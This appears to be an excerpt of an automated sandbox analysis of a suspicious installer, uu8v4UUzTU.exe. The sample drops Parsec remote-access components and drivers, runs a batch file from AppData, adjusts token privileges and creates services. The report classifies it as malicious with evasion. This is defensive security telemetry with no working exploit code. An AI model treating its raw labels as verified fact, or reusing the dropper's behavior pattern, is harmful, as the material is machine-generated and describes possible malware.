Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C4D6AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C3E6A4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C5065C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C535E4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C5A24C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C3F5C8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C49564
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C4E544
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C50CDC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C51C70
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C02BF0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C2DB70
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C3EAB4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C2EAA0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C04A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C21A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C239B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C469B8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C5C95C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C07060
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C3E090
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C20FE0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C3FF5C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C58EE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C57E1C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C5FDF4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C18DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C49D5C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C5DD94
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B84740
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BCF770
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B968B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B83190
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B814B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B88DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BB1960
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BC2CE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BC85E4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BB9589
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BCA72C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B91790
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BAF78C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BAD8C0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B948D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BBF8C8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B73220
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BB61E8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B9E190
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BAE2E4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B9D260
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BC03DC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B743A0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BC1370
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BC751C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B7C4D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BAEDF8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B74DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BB8D94
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BBFD5C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BBCD70
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BADED4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B90FE0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BC2F60
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BB8120
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BCF0D4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BAE0E0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B77060
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BCD074
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BB89E8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B939B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BADAC4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B91A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B74A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694B72BF0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BAFB90
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BADCD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BB5CDC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BBDC40
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 52_2_00007FF694BCBC3C
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Code function: 66_2_0040755C
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Code function: 66_2_00406D85
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750C68B0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750B4740
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750FF770
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750B3190
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750B14B0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750AC4D0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750B8DD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750E1960
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750F2CE4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750FA72C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750E9589
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750F85E4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750C48D0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750EF8C8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | Code function: 72_2_00007FF6750DD8C0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750C179072_2_00007FF6750C1790
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DF78C72_2_00007FF6750DF78C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750CD26072_2_00007FF6750CD260
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DE2E472_2_00007FF6750DE2E4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750CE19072_2_00007FF6750CE190
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E61E872_2_00007FF6750E61E8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750A322072_2_00007FF6750A3220
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750F751C72_2_00007FF6750F751C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750F137072_2_00007FF6750F1370
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750A43A072_2_00007FF6750A43A0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750F03DC72_2_00007FF6750F03DC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DDED472_2_00007FF6750DDED4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750ECD7072_2_00007FF6750ECD70
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750EFD5C72_2_00007FF6750EFD5C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E8D9472_2_00007FF6750E8D94
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750A4DD072_2_00007FF6750A4DD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DEDF872_2_00007FF6750DEDF8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750FD07472_2_00007FF6750FD074
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750A706072_2_00007FF6750A7060
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750FF0D472_2_00007FF6750FF0D4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DE0E072_2_00007FF6750DE0E0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E812072_2_00007FF6750E8120
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750F2F6072_2_00007FF6750F2F60
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750C0FE072_2_00007FF6750C0FE0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750C1A8072_2_00007FF6750C1A80
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750A4A8072_2_00007FF6750A4A80
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DDAC472_2_00007FF6750DDAC4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750C39B072_2_00007FF6750C39B0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E89E872_2_00007FF6750E89E8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750EDC4072_2_00007FF6750EDC40
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750FBC3C72_2_00007FF6750FBC3C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DDCD072_2_00007FF6750DDCD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E5CDC72_2_00007FF6750E5CDC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DFB9072_2_00007FF6750DFB90
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750A2BF072_2_00007FF6750A2BF0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Process token adjusted: Load Driver
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe Process token adjusted: Security
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Code function: String function: 00007FF6750A8380 appears 52 times
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Code function: String function: 00007FF6750A97D0 appears 99 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe Code function: String function: 00007FF763C097D0 appears 142 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe Code function: String function: 00007FF763C08380 appears 52 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe Code function: String function: 00007FF763C1EAE0 appears 53 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Code function: String function: 00007FF694B78380 appears 52 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Code function: String function: 00007FF694B797D0 appears 99 times
Source: uu8v4UUzTU.exe Static PE information: invalid certificate
Source: uu8v4UUzTU.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-61CCU.tmp.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: is-DQG3S.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-PBFIO.tmp.1.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: is-86N5H.tmp.1.dr Static PE information: No import functions for PE file found
Source: is-6EGJL.tmp.1.dr Static PE information: No import functions for PE file found
Source: is-JRFAI.tmp.1.dr Static PE information: No import functions for PE file found
Source: is-QSA3H.tmp.1.dr Static PE information: No import functions for PE file found
Source: is-BUN5H.tmp.1.dr Static PE information: No import functions for PE file found
Source: is-HCV6V.tmp.1.dr Static PE information: No import functions for PE file found
Source: is-8G60N.tmp.1.dr Static PE information: No import functions for PE file found
Source: is-1CLR0.tmp.1.dr Static PE information: No import functions for PE file found
Source: is-PSU9B.tmp.1.dr Static PE information: No import functions for PE file found
Source: is-P56QD.tmp.1.dr Static PE information: No import functions for PE file found
Source: uu8v4UUzTU.exe, 00000000.00000000.1715763878.00000000004C6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe, 00000000.00000003.1716990180.0000000002649000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe, 00000000.00000003.1717417935.000000007FE15000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe, 00000000.00000003.2155250071.00000000022C8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe Binary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: parsecvusba.sys.46.dr Binary string: \Device\USBFDO-%ws%d
Source: classification engine Classification label: mal42.evad.winEXE@125/200@3/2
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe Code function: 49_2_00007FF763C24560 GetLastError,FormatMessageA,LocalFree,49_2_00007FF763C24560
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe Code function: 5_2_00426830 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,5_2_00426830
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe Code function: 5_2_0041BD0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_0041BD0C
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Code function: 12_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,12_2_0040352D
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe Code function: 46_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,46_2_0040352D
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe Code function: 49_2_00007FF763C248D0 GetCurrentProcess,OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetFileSecurityW,InitializeSecurityDescriptor,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,SetFileSecurityW,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,SetSecurityDescriptorOwner,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,49_2_00007FF763C248D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Code function: 52_2_00007FF694B948D0 GetCurrentProcess,OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetFileSecurityW,InitializeSecurityDescriptor,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,SetFileSecurityW,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,SetSecurityDescriptorOwner,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,52_2_00007FF694B948D0
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe Code function: 66_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,66_2_0040352D
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Code function: 72_2_00007FF6750C48D0 GetCurrentProcess,OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetFileSecurityW,InitializeSecurityDescriptor,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,SetFileSecurityW,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,SetSecurityDescriptorOwner,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,72_2_00007FF6750C48D0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe Code function: 5_2_0041BC48 GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,5_2_0041BC48
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe Code function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,49_2_00007FF763C24400
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Code function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,52_2_00007FF694B94400
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe Code function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,72_2_00007FF6750C4400
Source: C:\Program Files\Parsec\pservice.exe Code function: 40_2_00007FF7EC021850 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,ProcessIdToSessionId,Process32NextW,CloseHandle,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,CloseHandle,CloseHandle,SetTokenInformation,CreateProcessAsUserW,CloseHandle,CloseHandle,40_2_00007FF7EC021850
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Code function: 12_2_004021AA CoCreateInstance,12_2_004021AA
Source: C:\Program Files\Parsec\pservice.exe Code function: 40_2_00007FF7EC022AC0 StartServiceCtrlDispatcherW,40_2_00007FF7EC022AC0
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\Program Files\Parsec
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Local\Programs
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
Source: C:\Windows\System32\drvinst.exe Mutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3068:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1612:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_03
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe File created: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp Process created: C:\Windows\SysWOW64\cmd.exe "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
